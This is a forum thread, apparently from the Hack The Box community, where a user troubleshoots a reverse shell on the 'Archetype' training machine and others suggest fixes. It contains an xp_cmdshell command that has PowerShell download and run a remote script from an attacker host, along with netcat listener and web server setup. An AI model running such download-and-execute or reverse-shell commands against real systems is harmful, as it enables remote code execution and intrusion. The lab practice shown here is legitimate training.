Archetype {Troubles with Ncat}

Hi, everyone!

I need some help with the Archetype machine. Specifically with Ncat, I have not been able to get it to respond when running the reverse shell. The commands used are the following:

Ncat

nc -lvnp 443

ufw allow from 10.10.10.27 proto tcp to any port 80,443
Ncat: Version 7.91 ( Ncat - Netcat for the 21st Century )
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Webserver (python)

python3 -m http.server 80

at the moment of executing the sentence in the SQL Server, the web server in python responds positively, but not Ncat, which remains in listening mode with no response

xp_cmdshell "powershell "IEX (New-Object Net.WebClient).DownloadString("http://10.10.14.14/shell.ps1\“);”
output

Webserver (python)
10.10.10.27 - - [04/Aug/2021 17:08:01] “GET /shell.ps1 HTTP/1.1” 200 -

Ncat
Ncat: Listening on :::443
Ncat: Listening on 0.0.0.0:443

Can you help me with ideas to solve this step please.

Thanks a lot, az0n0

anybody?
=(

I had the same problem at my first try. I’m not really sure what the problem is here, but on my second attempt i skipped the ufw command and it worked. I hope that’s it, but I’m not sure

HackTheBox Starting Point - ARCHETYPE - YouTube - hi, this is a complete tutorial about hacking this machine, its a bit different then the hacking-way shown here on HTB, but I think you can relate the similarities between both ways, and solve this. I have the same problem as you. I am willing to follow the youtube link

thank guys, I will review what they sent me and let you know how I am doing

Type your comment> @tamnik said:

https://www.youtube.com/watch?v=ZbSTVwUql3M - hi, this is a complete tutorial about hacking this machine, its a bit different then the hacking-way shown here on HTB, but I think you can relate the similarities between both ways, and solve this. I have the same problem as you. I am willing to follow the youtube link

It’s Work! Thanks a lot